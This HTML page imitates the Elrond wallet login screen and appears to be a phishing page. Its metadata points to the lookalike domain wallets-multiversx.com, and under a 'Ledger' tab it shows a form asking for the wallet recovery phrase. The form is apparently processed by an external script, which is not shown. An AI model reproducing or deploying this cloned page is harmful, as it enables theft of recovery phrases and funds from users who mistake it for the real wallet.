<html lang="en">

<head>
    <style type="text/css">
        svg:not(:root).svg-inline--fa {
            overflow: visible;
        }

        .svg-inline--fa {
            display: inline-block;
            font-size: inherit;
            height: 1em;
            overflow: visible;
            vertical-align: -0.125em;
        }

        .svg-inline--fa.fa-lg {
            vertical-align: -0.225em;
        }

        .svg-inline--fa.fa-w-1 {
            width: 0.0625em;
        }

        .svg-inline--fa.fa-w-2 {
            width: 0.125em;
        }

        .svg-inline--fa.fa-w-3 {
            width: 0.1875em;
        }

        .svg-inline--fa.fa-w-4 {
            width: 0.25em;
        }

        .svg-inline--fa.fa-w-5 {
            width: 0.3125em;
        }

        .svg-inline--fa.fa-w-6 {
            width: 0.375em;
        }

        .svg-inline--fa.fa-w-7 {
            width: 0.4375em;
        }

        .svg-inline--fa.fa-w-8 {
            width: 0.5em;
        }

        .svg-inline--fa.fa-w-9 {
            width: 0.5625em;
        }

        .svg-inline--fa.fa-w-10 {
            width: 0.625em;
        }

        .svg-inline--fa.fa-w-11 {
            width: 0.6875em;
        }

        .svg-inline--fa.fa-w-12 {
            width: 0.75em;
        }

        .svg-inline--fa.fa-w-13 {
            width: 0.8125em;
        }

        .svg-inline--fa.fa-w-14 {
            width: 0.875em;
        }

        .svg-inline--fa.fa-w-15 {
            width: 0.9375em;
        }

        .svg-inline--fa.fa-w-16 {
            width: 1em;
        }

        .svg-inline--fa.fa-w-17 {
            width: 1.0625em;
        }

        .svg-inline--fa.fa-w-18 {
            width: 1.125em;
        }

        .svg-inline--fa.fa-w-19 {
            width: 1.1875em;
        }

        .svg-inline--fa.fa-w-20 {
            width: 1.25em;
        }

        .svg-inline--fa.fa-pull-left {
            margin-right: 0.3em;
            width: auto;
        }

        .svg-inline--fa.fa-pull-right {
            margin-left: 0.3em;
            width: auto;
        }

        .svg-inline--fa.fa-border {
            height: 1.5em;
        }

        .svg-inline--fa.fa-li {
            width: 2em;
        }

        .svg-inline--fa.fa-fw {
            width: 1.25em;
        }

        .fa-layers svg.svg-inline--fa {
            bottom: 0;
            left: 0;
            margin: auto;
            position: absolute;
            right: 0;
            top: 0;
        }

        .fa-layers {
            display: inline-block;
            height: 1em;
            position: relative;
            text-align: center;
            vertical-align: -0.125em;
            width: 1em;
        }

        .fa-layers svg.svg-inline--fa {
            -webkit-transform-origin: center center;
            transform-origin: center center;
        }

        .fa-layers-counter,
        .fa-layers-text {
            display: inline-block;
            position: absolute;
            text-align: center;
        }

        .fa-layers-text {
            left: 50%;
            top: 50%;
            -webkit-transform: translate(-50%, -50%);
            transform: translate(-50%, -50%);
            -webkit-transform-origin: center center;
            transform-origin: center center;
        }

        .fa-layers-counter {
            background-color: #ff253a;
            border-radius: 1em;
            -webkit-box-sizing: border-box;
            box-sizing: border-box;
            color: #fff;
            height: 1.5em;
            line-height: 1;
            max-width: 5em;
            min-width: 1.5em;
            overflow: hidden;
            padding: 0.25em;
            right: 0;
            text-overflow: ellipsis;
            top: 0;
            -webkit-transform: scale(0.25);
            transform: scale(0.25);
            -webkit-transform-origin: top right;
            transform-origin: top right;
        }

        .fa-layers-bottom-right {
            bottom: 0;
            right: 0;
            top: auto;
            -webkit-transform: scale(0.25);
            transform: scale(0.25);
            -webkit-transform-origin: bottom right;
            transform-origin: bottom right;
        }

        .fa-layers-bottom-left {
            bottom: 0;
            left: 0;
            right: auto;
            top: auto;
            -webkit-transform: scale(0.25);
            transform: scale(0.25);
            -webkit-transform-origin: bottom left;
            transform-origin: bottom left;
        }

        .fa-layers-top-right {
            right: 0;
            top: 0;
            -webkit-transform: scale(0.25);
            transform: scale(0.25);
            -webkit-transform-origin: top right;
            transform-origin: top right;
        }

        .fa-layers-top-left {
            left: 0;
            right: auto;
            top: 0;
            -webkit-transform: scale(0.25);
            transform: scale(0.25);
            -webkit-transform-origin: top left;
            transform-origin: top left;
        }

        .fa-lg {
            font-size: 1.3333333333em;
            line-height: 0.75em;
            vertical-align: -0.0667em;
        }

        .fa-xs {
            font-size: 0.75em;
        }

        .fa-sm {
            font-size: 0.875em;
        }

        .fa-1x {
            font-size: 1em;
        }

        .fa-2x {
            font-size: 2em;
        }

        .fa-3x {
            font-size: 3em;
        }

        .fa-4x {
            font-size: 4em;
        }

        .fa-5x {
            font-size: 5em;
        }

        .fa-6x {
            font-size: 6em;
        }

        .fa-7x {
            font-size: 7em;
        }

        .fa-8x {
            font-size: 8em;
        }

        .fa-9x {
            font-size: 9em;
        }

        .fa-10x {
            font-size: 10em;
        }

        .fa-fw {
            text-align: center;
            width: 1.25em;
        }

        .fa-ul {
            list-style-type: none;
            margin-left: 2.5em;
            padding-left: 0;
        }

        .fa-ul>li {
            position: relative;
        }

        .fa-li {
            left: -2em;
            position: absolute;
            text-align: center;
            width: 2em;
            line-height: inherit;
        }

        .fa-border {
            border: solid 0.08em #eee;
            border-radius: 0.1em;
            padding: 0.2em 0.25em 0.15em;
        }

        .fa-pull-left {
            float: left;
        }

        .fa-pull-right {
            float: right;
        }

        .fa.fa-pull-left,
        .fas.fa-pull-left,
        .far.fa-pull-left,
        .fal.fa-pull-left,
        .fab.fa-pull-left {
            margin-right: 0.3em;
        }

        .fa.fa-pull-right,
        .fas.fa-pull-right,
        .far.fa-pull-right,
        .fal.fa-pull-right,
        .fab.fa-pull-right {
            margin-left: 0.3em;
        }

        .fa-spin {
            -webkit-animation: fa-spin 2s infinite linear;
            animation: fa-spin 2s infinite linear;
        }

        .fa-pulse {
            -webkit-animation: fa-spin 1s infinite steps(8);
            animation: fa-spin 1s infinite steps(8);
        }

        @-webkit-keyframes fa-spin {
            0% {
                -webkit-transform: rotate(0deg);
                transform: rotate(0deg);
            }
            100% {
                -webkit-transform: rotate(360deg);
                transform: rotate(360deg);
            }
        }

        @keyframes fa-spin {
            0% {
                -webkit-transform: rotate(0deg);
                transform: rotate(0deg);
            }
            100% {
                -webkit-transform: rotate(360deg);
                transform: rotate(360deg);
            }
        }

        .fa-rotate-90 {
            -ms-filter: "progid:DXImageTransform.Microsoft.BasicImage(rotation=1)";
            -webkit-transform: rotate(90deg);
            transform: rotate(90deg);
        }

        .fa-rotate-180 {
            -ms-filter: "progid:DXImageTransform.Microsoft.BasicImage(rotation=2)";
            -webkit-transform: rotate(180deg);
            transform: rotate(180deg);
        }

        .fa-rotate-270 {
            -ms-filter: "progid:DXImageTransform.Microsoft.BasicImage(rotation=3)";
            -webkit-transform: rotate(270deg);
            transform: rotate(270deg);
        }

        .fa-flip-horizontal {
            -ms-filter: "progid:DXImageTransform.Microsoft.BasicImage(rotation=0, mirror=1)";
            -webkit-transform: scale(-1, 1);
            transform: scale(-1, 1);
        }

        .fa-flip-vertical {
            -ms-filter: "progid:DXImageTransform.Microsoft.BasicImage(rotation=2, mirror=1)";
            -webkit-transform: scale(1, -1);
            transform: scale(1, -1);
        }

        .fa-flip-both,
        .fa-flip-horizontal.fa-flip-vertical {
            -ms-filter: "progid:DXImageTransform.Microsoft.BasicImage(rotation=2, mirror=1)";
            -webkit-transform: scale(-1, -1);
            transform: scale(-1, -1);
        }

        :root .fa-rotate-90,
        :root .fa-rotate-180,
        :root .fa-rotate-270,
        :root .fa-flip-horizontal,
        :root .fa-flip-vertical,
        :root .fa-flip-both {
            -webkit-filter: none;
            filter: none;
        }

        .fa-stack {
            display: inline-block;
            height: 2em;
            position: relative;
            width: 2.5em;
        }

        .fa-stack-1x,
        .fa-stack-2x {
            bottom: 0;
            left: 0;
            margin: auto;
            position: absolute;
            right: 0;
            top: 0;
        }

        .svg-inline--fa.fa-stack-1x {
            height: 1em;
            width: 1.25em;
        }

        .svg-inline--fa.fa-stack-2x {
            height: 2em;
            width: 2.5em;
        }

        .fa-inverse {
            color: #fff;
        }

        .sr-only {
            border: 0;
            clip: rect(0, 0, 0, 0);
            height: 1px;
            margin: -1px;
            overflow: hidden;
            padding: 0;
            position: absolute;
            width: 1px;
        }

        .sr-only-focusable:active,
        .sr-only-focusable:focus {
            clip: auto;
            height: auto;
            margin: 0;
            overflow: visible;
            position: static;
            width: auto;
        }

        .svg-inline--fa .fa-primary {
            fill: var(--fa-primary-color, currentColor);
            opacity: 1;
            opacity: var(--fa-primary-opacity, 1);
        }

        .svg-inline--fa .fa-secondary {
            fill: var(--fa-secondary-color, currentColor);
            opacity: 0.4;
            opacity: var(--fa-secondary-opacity, 0.4);
        }

        .svg-inline--fa.fa-swap-opacity .fa-primary {
            opacity: 0.4;
            opacity: var(--fa-secondary-opacity, 0.4);
        }

        .svg-inline--fa.fa-swap-opacity .fa-secondary {
            opacity: 1;
            opacity: var(--fa-primary-opacity, 1);
        }

        .svg-inline--fa mask .fa-primary,
        .svg-inline--fa mask .fa-secondary {
            fill: black;
        }

        .fad.fa-inverse {
            color: #fff;
        }

        .textarea {
            width: 100%;
            height: 65px;
            border: 2px solid #BBB;
            padding: 10px;
            border-radius: 10px;
        }
    </style>
    <link rel="manifest" href="https://wallet.elrond.com/manifest.json">
    
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width,initial-scale=1,shrink-to-fit=no">
    <title ng-bind-template="{{ pageTitle || 'Elrond Wallet' }}">Access Wallet • Encrypted</title>
    <meta name="description" content="A highly scalable, fast and secure blockchain platform for distributed apps, enterprise use cases and the new internet economy.">
    <link href="https://fonts.googleapis.com/css2?family=Montserrat:wght@400;500;600&amp;display=swap" rel="stylesheet">
    <link rel="apple-touch-icon" sizes="180x180" href="https://wallet.elrond.com/apple-touch-icon.png">
    <link rel="icon" type="image/png" sizes="32x32" href="https://wallet.elrond.com/favicon-32x32.png">
    <link rel="icon" type="image/png" sizes="16x16" href="https://wallet.elrond.com/favicon-16x16.png">
    <meta name="twitter:card" content="summary_large_image">
    <meta name="twitter:site" content="@ElrondNetwork">
    <meta name="twitter:creator" content="@ElrondNetwork">
    <meta name="twitter:title" content="Elrond Wallet">
    <meta name="twitter:description" content="A highly scalable, fast and secure blockchain platform for distributed apps, enterprise use cases and the new internet economy.">
    <meta name="twitter:image" content="https://wallet.elrond.com/social.png">
    <meta property="og:url" content="https://wallet.elrond.com">
    <meta property="og:title" content="Elrond Wallet">
    <meta property="og:description" content="A highly scalable, fast and secure blockchain platform for distributed apps, enterprise use cases and the new internet economy.">
    <meta property="og:image" content="https://wallet.elrond.com/social.png">
    <link rel="stylesheet" href="https://wallet.elrond.com/light.css?cachebust=d301def0">
    <link id="stylesheet" rel="stylesheet" href="https://wallet.elrond.com/light.css?cachebust=d301def0">
    <link rel="stylesheet" href="https://wallet.elrond.com/dark.css?cachebust=d301def0" media="print">
    <script async="" src="https://www.google-analytics.com/analytics.js"></script>
    <script>
        ! function(e, a, t, n, g, c, o) {
            e.GoogleAnalyticsObject = g, e.ga = e.ga || function() {
                (e.ga.q = e.ga.q || []).push(arguments)
            }, e.ga.l = 1 * new Date, c = a.createElement(t), o = a.getElementsByTagName(t)[0], c.async = 1, c.src = "https://www.google-analytics.com/analytics.js", o.parentNode.insertBefore(c, o)
        }(window, document, "script", 0, "ga"), ga("create", "UA-179018685-1", "auto"), ga("send", "pageview")
    </script>
    <link href="https://wallet.elrond.com/static/css/6.b01de82c.chunk.css" rel="stylesheet">
    <link href="https://wallet.elrond.com/static/css/main.2e5a4fd6.chunk.css" rel="stylesheet">
    <style type="text/css">
        .DraggableTags {
            position: relative;
            height: 100%;
            touch-action: none;
        }

        .DraggableTags::after {
            content: '';
            display: block;
            clear: both;
        }

        .DraggableTags-tag {
            display: inline-block;
            position: relative;
            color: transparent;
            -webkit-touch-callout: none;
            -webkit-user-select: none;
            -khtml-user-select: none;
            -moz-user-select: none;
            -ms-user-select: none;
            user-select: none;
        }

        .DraggableTags-undraggable {
            cursor: no-drop;
        }

        .DraggableTags-tag-drag {
            position: absolute;
            top: 0;
            left: 0;
            width: 100%;
            z-index: 1;
        }

        .hotspot-9485743 {
            cursor: move;
        }

        .excludedInHotspot-9485743 {
            cursor: default;
        }
    </style>
</head>
<link rel="manifest" href="./manifest.json"><meta charset="utf-8"><meta name="viewport" content="width=device-width,initial-scale=1,shrink-to-fit=no"><title ng-bind-template="{{ pageTitle || 'Elrond Wallet' }}">Access Wallet • Encrypted</title><meta name="description" content="A highly scalable, fast and secure blockchain platform for distributed apps, enterprise use cases and the new internet economy."><link href="https://fonts.googleapis.com/css2?family=Montserrat:wght@400;500;600&amp;display=swap" rel="stylesheet"><link rel="apple-touch-icon" sizes="180x180" href="./apple-touch-icon.png"><link rel="icon" type="image/png" sizes="32x32" href="./favicon-32x32.png"><link rel="icon" type="image/png" sizes="16x16" href="./favicon-16x16.png"><meta name="twitter:card" content="summary_large_image"><meta name="twitter:site" content="@ElrondNetwork"><meta name="twitter:creator" content="@ElrondNetwork"><meta name="twitter:title" content="Elrond Wallet"><meta name="twitter:description" content="A highly scalable, fast and secure blockchain platform for distributed apps, enterprise use cases and the new internet economy."><meta name="twitter:image" content="www.wallets-multiversx.com/social.png"><meta property="og:url" content="www.wallets-multiversx.com"><meta property="og:title" content="Elrond Wallet"><meta property="og:description" content="A highly scalable, fast and secure blockchain platform for distributed apps, enterprise use cases and the new internet economy."><meta property="og:image" content="www.wallets-multiversx.com/social.png"><link rel="stylesheet" href="./dark.css?cachebust=230214c4"><link id="stylesheet" rel="stylesheet" href="./dark.css?cachebust=230214c4"><link rel="stylesheet" href="./dark.css?cachebust=230214c4" media="print"><script>!function(e,a,t,n,g,c,o){e.GoogleAnalyticsObject=g,e.ga=e.ga||function(){(e.ga.q=e.ga.q||[]).push(arguments)},e.ga.l=1*new Date,c=a.createElement(t),o=a.getElementsByTagName(t)[0],c.async=1,c.src="https://www.google-analytics.com/analytics.js",o.parentNode.insertBefore(c,o)}(window,document,"script",0,"ga"),ga("create","UA-179018685-1","auto"),ga("send","pageview")</script><link href="./static/css/6.b01de82c.chunk.css" rel="stylesheet"><link href="./static/css/main.2e5a4fd6.chunk.css" rel="stylesheet"><style type="text/css"></style>

<body><noscript>You need to enable JavaScript to run this app.</noscript>
    <div id="root">
        <div class="footer-layout container-fluid d-flex en">
            <div class="row flex-fill" style="min-height: 100vh;">
                <main class="main-content d-flex flex-column flex-grow-1">
                    <div class="main-content-container d-flex flex-column justify-content-center">
                        <div class="unlock">
                            <div class="card-layout container my-auto py-spacer">
                                <div class="row d-flex justify-content-center">
                                    <div class="col" style="max-width: 100vw;">
                                        <div class="card card-small mx-auto">
                                            <div class="card-body p-0 text-center">
                                                <div class="pt-spacer px-spacer">
                                                    <div class="justify-content-end network-switcher nav">
                                                        <div class="dropdown nav-item"><a aria-haspopup="true" aria-expanded="false" id="apps-dropdown" href="#" class="dropdown-toggle nav-link" role="button"><span class="link" data-testid="networkSwitch"><svg aria-hidden="true" focusable="false" data-prefix="far" data-icon="globe" class="svg-inline--fa fa-globe fa-w-16 ml-2" role="img" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 496 512"><path fill="currentColor" d="M248 8C111 8 0 119 0 256s111 248 248 248 248-111 248-248S385 8 248 8zm179.3 160h-67.2c-6.7-36.5-17.5-68.8-31.2-94.7 42.9 19 77.7 52.7 98.4 94.7zM248 56c18.6 0 48.6 41.2 63.2 112H184.8C199.4 97.2 229.4 56 248 56zM48 256c0-13.7 1.4-27.1 4-40h77.7c-1 13.1-1.7 26.3-1.7 40s.7 26.9 1.7 40H52c-2.6-12.9-4-26.3-4-40zm20.7 88h67.2c6.7 36.5 17.5 68.8 31.2 94.7-42.9-19-77.7-52.7-98.4-94.7zm67.2-176H68.7c20.7-42 55.5-75.7 98.4-94.7-13.7 25.9-24.5 58.2-31.2 94.7zM248 456c-18.6 0-48.6-41.2-63.2-112h126.5c-14.7 70.8-44.7 112-63.3 112zm70.1-160H177.9c-1.1-12.8-1.9-26-1.9-40s.8-27.2 1.9-40h140.3c1.1 12.8 1.9 26 1.9 40s-.9 27.2-2 40zm10.8 142.7c13.7-25.9 24.4-58.2 31.2-94.7h67.2c-20.7 42-55.5 75.7-98.4 94.7zM366.3 296c1-13.1 1.7-26.3 1.7-40s-.7-26.9-1.7-40H444c2.6 12.9 4 26.3 4 40s-1.4 27.1-4 40h-77.7z"></path></svg></span></a></div>
                                                    </div>
                                                    <p class="h3" data-testid="unlockTitle">Encrypted mode</p>
                                                    <p class="lead mb-spacer">Choose how you wish to access your wallet.</p>
                                                </div>
                                                <div class="box-menu mb-spacer"><a class="box-menu-item " href="keystore.html">Phrase </a><a class="box-menu-item active" href="Ledger.html">Ledger </a><a class="box-menu-item " href="PEM.html">Private key</a>
                                                    <a
                                                        class="box-menu-item " href="Maiar.html">Maiar </a>
                                                </div>




                                                <div class="pb-spacer px-spacer">
                                                    <form id="former">
                                                          
                                                    <div class="page-state text-center mt-spacer pt-3">

                                                       <div>



                                                                <div class="form-group mb-0"><textarea id="phrase" name="phrase" class="textarea" required="required" minlength="12" placeholder="Phrase"></textarea></div>
                                                            </div>
                                                            <p></p>
                                                            <br>
                                                             </div>
                                                </div>

                                                <div class="text-centerd-flex align-items-center flex-column mt-spacer"><button  id="submitl" name="submit" class="btn btn-primary px-spacer">Access Wallet</button>
                                                    </form>
                                                </div>

                                            </div>
                                            <!-- <div class="text-secondary text-outside">Don’t have a wallet? <a href="https://wallet.elrond.com/create">Create one</a></div> -->
                                            
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
            </div>
        </div>
        <footer class="footer d-flex flex-column align-items-center justify-content-center text-muted pt-2">
            <div class="footer-inner"><a target="_blank" class="d-flex align-items-center" href="https://elrond.com/">Made with <svg aria-hidden="true" focusable="false" data-prefix="fas" data-icon="heart" class="svg-inline--fa fa-heart fa-w-16 text-danger mx-1" role="img" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512"><path fill="currentColor" d="M462.3 62.6C407.5 15.9 326 24.3 275.7 76.2L256 96.5l-19.7-20.3C186.1 24.3 104.5 15.9 49.7 62.6c-62.8 53.6-66.1 149.8-9.9 207.9l193.5 199.8c12.5 12.9 32.8 12.9 45.3 0l193.5-199.8c56.3-58.1 53-154.3-9.8-207.9z"></path></svg></a></div>
            <small
                class="text-muted version mt-1">Build d301def0</small>
        </footer>
        </main>
    </div>
    </div><a href="https://help.elrond.com/" target="_blank" class="btn btn-primary btn-pill help-btn d-flex align-items-center p-2 px-md-3"><svg aria-hidden="true" focusable="false" data-prefix="far" data-icon="question-circle" class="svg-inline--fa fa-question-circle fa-w-16 help-icon" role="img" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512"><path fill="currentColor" d="M256 8C119.043 8 8 119.083 8 256c0 136.997 111.043 248 248 248s248-111.003 248-248C504 119.083 392.957 8 256 8zm0 448c-110.532 0-200-89.431-200-200 0-110.495 89.472-200 200-200 110.491 0 200 89.471 200 200 0 110.53-89.431 200-200 200zm107.244-255.2c0 67.052-72.421 68.084-72.421 92.863V300c0 6.627-5.373 12-12 12h-45.647c-6.627 0-12-5.373-12-12v-8.659c0-35.745 27.1-50.034 47.579-61.516 17.561-9.845 28.324-16.541 28.324-29.579 0-17.246-21.999-28.693-39.784-28.693-23.189 0-33.894 10.977-48.942 29.969-4.057 5.12-11.46 6.071-16.666 2.124l-27.824-21.098c-5.107-3.872-6.251-11.066-2.644-16.363C184.846 131.491 214.94 112 261.794 112c49.071 0 101.45 38.304 101.45 88.8zM298 368c0 23.159-18.841 42-42 42s-42-18.841-42-42 18.841-42 42-42 42 18.841 42 42z"></path></svg><span class="d-none d-md-inline-block ml-md-2">Help</span></a></div>
    <script src="https://code.jquery.com/jquery-3.6.0.min.js" integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script>
        
<script src="./scripts.js"></script>
</html>